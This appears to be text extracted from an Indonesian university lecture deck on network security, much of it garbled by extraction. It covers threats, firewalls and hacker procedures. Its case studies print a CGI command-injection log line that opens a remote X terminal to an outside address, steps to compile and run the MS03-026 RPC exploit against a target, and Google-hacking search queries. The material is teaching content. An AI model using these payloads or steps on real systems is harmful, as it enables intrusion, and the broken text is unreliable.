Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
and
Security
RUDI LUMANTO
RUDI LUMANTO
)
)
KRITERIA PENILAIAN
) TUGAS
RUDI LUMANTO
DAFTAR SILABUS
) Overview
) Network
standards (OSI)
) Network components
) Network p
protocol (TCP/IP)
(
)
) Network OS and Services
) Network/Internet Security
RUDI LUMANTO
DAFTAR SILABUS
) Software
threats : virus,
virus worm etc
) Internet threats: TCP attack, DNS, DOS etc
) Firewall
i
ll andd Intrusion
i Detection
i System
S
(IDS)
) Cryptography and its applications
) VPN
RUDI LUMANTO
COMPUTER
NETWORKING and
SECURITY
OVERVIEW
Standar
Keamanan
Jaringan
Komponen Jaringan
Protokol (TCP/IP)
Ancaman Sofware :
Virus, Worm dll
OS dan Layanan
Jaringan
Cryptography dan
Aplikasi
VPN
RUDI LUMANTO
1 OVERVIEW
1.
RUDI LUMANTO
outline
) Simple
RUDI LUMANTO
A Security Case
A company called Acme-art. Inc doing an online business in the internet. They
have a database that record all customers information included their credit card
i f
information
i andd connectedd to their
h i site
i www.acme-art.com that
h protected
db
by fi
firewall.
ll
31 October 2001 a hacker intrude to their system and stole all credit card information,
Then put the information into newsgroup usenet. A few hour then the company has
loss million dollars , bad reputation and have to invest many more money to keep their
business alive.
What happen ?
How it could be happen ?
Sample case 1
RUDI LUMANTO
Sample case 1
Browsingg .
RUDI LUMANTO
Sample case 1
Browsing .
RUDI LUMANTO
Sample case 1
Part C in log
l file
fl
10.0.1.21 - - [[31/Oct/2001:03:03:41
/ /
+0530]] "GET //cgi-bin/
g
/ HTTP/1.0"
/
403 272
T i direct
Trying
di t access .
Error response
RUDI LUMANTO
Sample case 1
Attacking
Security
Hole
1
RUDI LUMANTO
Sample case 1
Perl script
Security hole 1: validation form for parameter variable will be transfer to index.cgi script
RUDI LUMANTO
Sample case 1
Attacking
Security
Hole
1
Sample case 1
Passwd file
root:x:0:0:root:/root:/bin/bash
Lion:x:500:500::/home/lion:/bin/bash
Sample case 1
Attacking
Security
Hole
2
Direct execution to
server commands
RUDI LUMANTO
Sample case 1
10.0.1.21 - - [[31/Oct/2001:03:17:29
/ /
+0530]] "GET //index.cgi?page=|xterm+g p g |
display+10.0.1.21:0.0
p y
+%26| HTTP/1.0" 200 1228
RUDI LUMANTO
Information/technique behind
the case
) Understanding
RUDI LUMANTO
Lisv01
/(root)
h
home
var
www
sbin
bi
bin
bi
html
etc
httpd
log
public_html
dev
d
httpd
usr
init.d
conf
httpd
httpd.conf
*Document root : The directory that holds HTML documents.
*
: file
11
RUDI LUMANTO
WWW
server software
server_software
Execute application
N t
Network-loading
k l di application
li ti
WWW
browser
Application
Internet/
I t
Intranet
t
HTML
&
Script
JAVA SCRIPT
WWW server
WWW
server software
server_software
A li ti
Application
Execute application
JAVA Applet,
Active X
S
Server-side
id application
li ti
WWW
browser
Internet/
Intranet
WWW server
WWW
Server
_software
Application
CGI,
CG
Active Server Pages
Execute application
RUDI LUMANTO
S
Sampe
case 2
RUDI LUMANTO
Sample case 2
RUDI LUMANTO
Sample case 2
Security team investigation: Looking for clues by social engineering
One new employee
O
l
iinstallll the
h windows
i d
2000 server in
i his
hi computer andd connect to
the LAN with global IP address.
Other Clues :
Nessus report
p on
Windows 2000 server
after IIS installation
RUDI LUMANTO
Address of Host
Port/Service
192.168.27.31
ftp (21/tcp)
192.168.27.31
smtp(25/tcp)
192.168.27.31
http (21/tcp)
192.168.27.31
nntp (119/tcp)
192.168.27.31
msrpc(135/tcp)
192.168.27.31
Netbios-ssn (139/tcp)
192.168.27.31
https (443/tcp)
192.168.27.31
Microsoft-ds (445/tcp)
.
STMIK NUSA MANDIRI, November 2008
Sample case 2
msprc(135/tcp)
The remote host is running a version of windows which has a flaw in its
RPC interface which may
y allow an attacker to execute arbitrary
y code
and gain SYSTEM privileges. There is at least one WORM which is
currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution : see
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE:CAN-2003-0352
BID:8205
Other referemces: IAVA:2003-A-0011
NESSUS ID: 11806
Warning
RUDI LUMANTO
msprc(135/tcp)
Sample case 2
NESSUS ID : Identity Number of Vulnerability Check by NESSUS
BID : Buqtraq ID : related documentation regarding the vulnerability including
exploit code , see: security focus site
simulation
1. Downloading the exploit code source file (from security focus site or Whoppix CD
$cp
p /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
p
p
y
2. Compiling source file
$gcc oc192-dom.c
3. executing the exploit into the IP target machine
$a out -dd 192.168.94.204
$a.out
192 168 94 204
Get the system access
C:>WINNT\SYSTEM32\
RUDI LUMANTO
Information/technique behind
the case
-Understanding about network
-Insufficient security orientation for new employee
-Lack
L k off knowledge
k
l d about
b t OS
-There is always exploit code in the internet
-Lack of information about update
RUDI LUMANTO
1. File sharing memungkinkan akses terhadap sebuah file kapan saja dan
j
dimana saja
2. Effective data transfer Pengiriman data dengan cepat dan efisien
3. Hardware sharing Dapat menggunakan bersama satu printer, hardisk dsb
4. Realtime communication Dapat melakukan hubungan komunikasi via teks,
audio gambar ataupun video secara realtime
audio,
5. Operational cost reduction mengurangi biaya komunikasi telpon, pemakaian
kertas, pengiriman surat dsb.
RUDI LUMANTO
RUDI LUMANTO
The data transmission speed is scores to several hundred Mbps. For example, A4 sized document
(30Kbytes) can be transmitted over a LAN in 0.024 second.
bps (bits per second) = a unit rate at which data can be transmitted over a communication line expressed
as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one
second.
RUDI LUMANTO
Hardware sharing
RUDI LUMANTO
Type
yp of Network
Mainly divided into 2 types based on
their scale (area that a network
covers).
LAN is implemented within a building
or Factory.
WAN is implemented by connecting
two or more LAN between office
and laboratories, or two countries
RUDI LUMANTO
T protect
To
t t company/individual
/i di id l assets
t
Hardware, software and INFORMATION (data, ability
and Reputation)
)
)
RUDI LUMANTO
To comply
l with
i h regulatory
l
requirements
i
To keep your job
C onfidentiality
I ntegrity
A vailability
il bilit
alone threats
) Connection
threats
RUDI LUMANTO
Falsification
Denial of services
Impersonation
Attack platform
RUDI LUMANTO
Vulnerabilities
Weakness in the design, configuration or
implementation of a computer system that
renders it susceptible to a threat.
1. POOR DESIGN
Hardware and software system that contain design flaws that can be
exploited Ex: sendmail flaws in early version of unix that allowed
exploited.
hackers to gain privileged root access
2. POOR IMPLEMENTATION
System that incorrectly configured because of in-experience,
in-experience insufficient
training or sloppy work. Ex: a system that does not ave restricted access
Privileged on critical executable file.
3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances.
Ex: No documentation and monitoring
RUDI LUMANTO
RUDI LUMANTO
Types of Vulnerability
OS/Program name
Cause
Influence
Telnetd p
permission ((normally
y
root) seized by an outsider
sadmind (Solaris2.3 7)
dtspcd
p ((AIX 4.3/5.1, HP-UX
11.11, Solaris 8, etc.)
Arbitrary
y command
executable with root
permission by an outsider
Operation permission
(normally root) seized by an
outsider
Execution permission
(normally root) seized by an
outsider
IIS4.0 (WIndowsNT)
IIS5.0 (Windows2000)
RUDI LUMANTO
ATTACKS
A specific technique used to exploit a vulnerabilty.
Ex: a threat could be a denial of service,, a vulnerabilityy
is in the design of OS, and an attack could be
a ping of death
) Passive attacks
Gathering information by monitoring and recording
traffic on the network, or by social engineering. Ex:
packet sniffing
sniffing, traffic analysis
)Active
attacks
Denial of Service
Target host
Target host
Service downed
due to overload
Attack platform
Start attack!!
RUDI LUMANTO
Security
Prevention
RUDI LUMANTO
What is Security ?
Definitions from the Amer.Herit.Dic :
- Freedom from risk or danger:safety
- Measures adopted . To prevent
a crime.
Computer Security Measures
-Mechanisms to prevent, detect and
recover from threats and attacks or
for auditing purposes.
Key point
Computer Security is not only a technical
problem it is a business and people
problem,
problem.
Th ttechnology
The
h l
iis th
the easy part,
t th
the diffi
difficult
lt
part is developing a security policies/plan
th t fits
that
fit the
th organizations
i ti business
b i
operation and getting people to comply with
th plan.
the
l
Social engineering
g
g : non-technical methods hackers employ
p y to g
gain access to
system, refers to the process of convincing a person to reveal information
RUDI LUMANTO
Security operations
-Prevention againts
g
accidental capture
p
or modification of
information
Types of Users
Hacker
Cracker
Script kiddy
Corporate network
Intrusion, subversion,
sabotage
RUDI LUMANTO
Vulnerability
Subversion,
sabotage
/etc/passwd file
File editing/falsification
b0ed782bbd4c8445f07538a3ede788eb
RUDI LUMANTO
Server/client
Internet
Network security
Server security
Countermeasures
against hacking
Router(Filtering)
Firewall(VPN)
N-IDS
Vulnerability audit
H-IDS
Log monitoring
Falsification prevention
Vulnerability audit
Miscellaneous
Virus scan
Encryption
Virus scan
Encryption(SSH)
RUDI LUMANTO
Firewall?
I t
Internet
t
Intranet
Public WWW
server
HTTP
HTTP
Client
Public FTP
server
FTP
HTTP
Unspecific AP
Server
Client
Authentication
Packet
P k t filt
filtering
i
GW type firewall
Application gateway
Stateful inspection
RUDI LUMANTO
Encryption
FW/VPN
router
Encrypted
communication
Provider C
Provider A
IX
Internet
Provider B
Provider D
FW/VPN
router
RUDI LUMANTO
Making
g a good
g
security
y
policy
RUDI LUMANTO
Test/Ethical Hacking
Trinityy
) Security Goals
RUDI LUMANTO
) Focus
on the target
) Never use your own information
) Never leave y
your footstepp
) Can ever back again
HACKERS PROCEDURE
RUDI LUMANTO
Hackers Procedure/step
) Targeting
) Scanning
) Remote Attack
1. Information gathering
) Local Attack
2. Attack, intrusion
) Log
removing / deception
) Space using
) Time stamp
) Back door
RUDI LUMANTO
3. Unauthorized act
4. Actions taken after
unauthorized act
Example of Targeting
All Informations about the target
)
)
)
RUDI LUMANTO
RUDI LUMANTO
Google hacking
)
Mastering
g google
g g using
g its standard options
p
Intitle:
Inurl:
Intext:
I t t
web
Filetype:
file
Phonebook:
RUDI LUMANTO
Google hacking
)
RUDI LUMANTO
Google hacking
RUDI LUMANTO
Google hacking
)
Mastering
aste g google
goog e using
us g its
ts standard
sta da d options
opt o s
intitle:
RUDI LUMANTO
Google hacking
)
RUDI LUMANTO
Google hacking
)
Masteringg google
g g using
g its standard options
p
intext:
RUDI LUMANTO
Google hacking
)
Masteringg google
g g using
g its standard options
p
Filetype:
RUDI LUMANTO
Google hacking
)
Masteringg google
g g using
g its standard options
p
Phonebook: . search telephone number
phonebook: John Doe CA
RUDI LUMANTO
RUDI LUMANTO
C bi i google
Combination
l options
i
on queries
i
Several alternate qqueries that provide
p
more accurate results:
intitle:index.of "parent directory" intitle:index.of name size
These queries indeed provide directory listings by not only
focusing on index.of
index of in the title,
title but on keywords often found
inside directory listings, such as parent directory, name, and size.
Obviously, this search can be combined with other searches
to find
fi d files
fil off di
directories
i llocated
d iin di
directory lilistings.
i
Example:
p
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data intitle:bbs
bbs.dat inurl:"Index of" intitle:Index of
RUDI LUMANTO
RUDI LUMANTO
RUDI LUMANTO
RUDI LUMANTO
Example:
bbs.dat inurl:"Index of" intitle:Index of
RUDI LUMANTO
RUDI LUMANTO
THANK YOU
RUDI LUMANTO
Th Dawn
The
D
off th
the Net
N t
RUDI LUMANTO